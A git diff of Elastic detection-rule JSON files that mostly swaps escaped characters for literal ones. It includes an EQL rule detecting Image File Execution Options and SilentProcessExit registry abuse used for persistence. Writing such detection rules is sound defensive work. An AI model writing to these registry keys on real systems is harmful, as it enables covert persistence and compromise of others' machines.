\"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n",
 "references": [
 "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/"
 ],
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_103.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_103.json
index 44f5a90287e..e2792d5d3ce 100644
--- a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_103.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Image File Execution Options Injection",
- "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) \u003e 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n",
+ "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n 
\"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n",
 "references": [
 "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/"
 ],
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_104.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_104.json
index 89d606c98ac..37aa1c9ab2a 100644
--- a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_104.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Image File Execution Options Injection",
- "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) \u003e 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n",
+ "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n 
\"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n",
 "references": [
 "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/"
 ],
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_105.json b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_105.json
index 8e049eac5f3..6feb8e4c560 100644
--- a/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6839c821-011d-43bd-bd5b-acff00257226_105.json
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Image File Execution Options Injection", - "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) \u003e 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", + "query": "registry where host.os.type == \"windows\" and length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n 
\"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*.exe\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\Debugger\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\*\\\\MonitorProcess\"\n ) and\n /* add FPs here */\n not registry.data.strings regex~ (\"\"\"C:\\\\Program Files( \\(x86\\))?\\\\ThinKiosk\\\\thinkiosk\\.exe\"\"\", \"\"\".*\\\\PSAppDeployToolkit\\\\.*\"\"\")\n", "references": [ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" ], @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_101.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_101.json index 147d28d38cd..fc3bb03ea0a 100644 --- a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_102.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_102.json index 0648a5d258b..f79853e76f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_103.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_103.json index a38c35a893a..162f1213449 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_103.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_103.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
@@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_104.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_104.json index 2155e6e26ca..79bb4e372e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_104.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_105.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_105.json index 8b488a2c309..336724f6eab 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_105.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_106.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_106.json index 46ef23a7294..ea32eb66d38 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_106.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_107.json b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_107.json index b7d3c4aa4b2..41cd90c2bdb 100644 --- a/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/68921d85-d0dc-48b3-865f-43291ca2c4f2_107.json 
@@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "68921d85-d0dc-48b3-865f-43291ca2c4f2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_204.json b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_204.json index e5a7cc0026c..1849f78dd03 100644 --- a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_204.json +++ b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_204.json 
@@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_205.json b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_205.json index 3812fcb8cd6..362407a5155 100644 --- a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_205.json +++ b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_205.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_206.json b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_206.json index 7bd1621e6e0..44b91788a7b 100644 --- a/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_206.json +++ b/packages/security_detection_engine/kibana/security_rule/68994a6c-c7ba-4e82-b476-26a26877adf6_206.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_102.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_102.json index 17dcb5402e5..048a1310d41 100644 --- a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_102.json 
@@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_103.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_103.json index 5e851271641..0900084300a 100644 --- a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_103.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_104.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_104.json index cbfac92027d..20b481b65e3 100644 --- a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_104.json @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_105.json b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_105.json index cea077b90e6..88e1ce0b9da 100644 --- a/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/689b9d57-e4d5-4357-ad17-9c334609d79a_105.json 
@@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_105.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_105.json index 27a6d26daca..bb91d6eafb8 100644 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_106.json b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_106.json index ef5b7575665..f9fd2f31bf7 100644 --- a/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/68a7a5a5-a2fc-4a76-ba9f-26849de881b4_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
